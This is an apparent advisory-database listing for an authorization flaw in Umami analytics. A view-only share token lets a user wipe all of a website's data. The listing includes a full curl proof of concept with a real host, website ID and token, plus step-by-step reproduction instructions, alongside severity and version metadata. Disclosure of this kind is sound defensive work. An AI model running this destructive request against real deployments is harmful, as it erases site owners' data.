Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I
Anyone with a share link can RESET all website data in Umami
Summary
Anyone with a share link (permissions to view) can reset the website data.
Details
When a user navigates to a /share/
URL, he receives a share token which is used for authentication. This token is later verified by useAuth
. After the token is verified, the user can call most of the GET
APIs that allow fetching stats about a website.
The POST /reset
endpoint is secured using canViewWebsite
which is the incorrect verification for such destructive action. This makes it possible to completly reset all website data ONLY with view permissions - permalink
PoC
curl -X POST 'https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset' \
-H 'authority: analytics.umami.is' \
-H 'accept: application/json' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'authorization: Bearer undefined' \
-H 'cache-control: no-cache' \
-H 'content-type: application/json' \
-H 'pragma: no-cache' \
-H 'referer: https://analytics.umami.is/share/bw6MFhkwpwEXFsbd/test' \
-H 'sec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36' \
-H 'x-umami-share-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ3ZWJzaXRlSWQiOiJiODI1MDYxOC1jY2I1LTQ3ZmItODM1MC0zMWM5NjE2OWExOTgiLCJpYXQiOjE2OTAzNjkxOTl9.zTfwFrfggE5na7rOOgkUobEBm48AH_8WVyh2RgJGzcw' \
--compressed
You can reproduce this by:
- Accessing a website using it's share link
- Copy the
token
received from the the received from theGET /share/{website-id}
- Send a POST request to
https://analytics.umami.is/api/websites/b8250618-ccb5-47fb-8350-31c96169a198/reset
withx-umami-share-token:
header equal to the token copied in the previous step - The website data is now cleared
Impact
Everyone with an open share link exposed to the internet!
Permalink: https://github.com/advisories/GHSA-8www-cffh-4q98JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04d3d3LWNmZmgtNHE5OM4AA08I
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 1 year ago
Updated: over 1 year ago
CVSS Score: 9.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H
Identifiers: GHSA-8www-cffh-4q98
References:
- https://github.com/umami-software/umami/security/advisories/GHSA-8www-cffh-4q98
- https://github.com/umami-software/umami/commit/ec48a4e3250e9cefc481b339a90e6ceea6f1ec2b
- https://github.com/advisories/GHSA-8www-cffh-4q98
Blast Radius: 0.0
Affected Packages
npm:umami
Dependent packages: 1Dependent repositories: 1
Downloads: 195 last month
Affected Version Ranges: < 2.3.1
Fixed in: 2.3.1
All affected versions: 0.0.0, 0.1.0
All unaffected versions: 2.10.0